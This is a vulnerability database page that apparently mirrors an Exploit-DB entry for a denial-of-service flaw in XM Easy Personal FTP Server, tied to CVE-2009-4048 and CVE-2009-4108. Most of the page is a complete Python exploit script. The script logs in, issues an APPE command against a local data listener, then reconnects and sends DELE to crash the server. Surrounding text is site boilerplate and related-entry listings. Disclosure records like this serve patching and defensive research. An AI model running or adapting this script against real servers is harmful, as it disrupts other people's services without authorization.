Lucene search
+L

XM Easy Personal FTP Server - 'APPE' / 'DELE' Denial of Service

🗓️ 13 Nov 2009 00:00:00Reported by zhangmcType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

XM Easy Personal FTP Server 'APPE' / 'DELE' Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2009-4048
13 Nov 200900:00
circl
Circl
CVE-2009-4108
13 Nov 200900:00
circl
CVE
CVE-2009-4048
23 Nov 200917:00
cve
CVE
CVE-2009-4108
28 Nov 200911:00
cve
Cvelist
CVE-2009-4048
23 Nov 200917:00
cvelist
Cvelist
CVE-2009-4108
28 Nov 200911:00
cvelist
Exploit DB
XM Easy Personal FTP Server 5.8.0 - Remote Denial of Service
24 Nov 200900:00
exploitdb
EUVD
EUVD-2009-4019
7 Oct 202500:30
euvd
EUVD
EUVD-2009-4079
7 Oct 202500:30
euvd
NVD
CVE-2009-4048
23 Nov 200917:30
nvd
Rows per page
#!/usr/bin/python
import socket
import sys

def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
test_string="a"
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_data = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

sock_data.bind(('127.0.0.1',31339))
sock_data.listen(1)

sock.send("PORT 127,0,0,1,122,107\r\n")
print "[-] "+ ("PORT 127,0,0,1,122,107\r\n")
r=sock.recv(1024)
print "[+] "+ r

sock.send("APPE "+ test_string +"\r\n")
print "[-] "+ ("APPE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r

sock.close()

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
print "[+] "+ r
sock.send("user %s\r\n" %username)
print "[-] "+ ("user %s\r\n" %username)
r=sock.recv(1024)
print "[+] "+ r
sock.send("pass %s\r\n" %passwd)
print "[-] "+ ("pass %s\r\n" %passwd)
r=sock.recv(1024)
print "[+] "+ r

sock.send("DELE "+ test_string +"\r\n")
print "[-] "+ ("DELE "+ test_string +"\r\n")
r=sock.recv(1024)
print "[+] "+ r

sys.exit(0);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Nov 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24
EPSS0.02434
32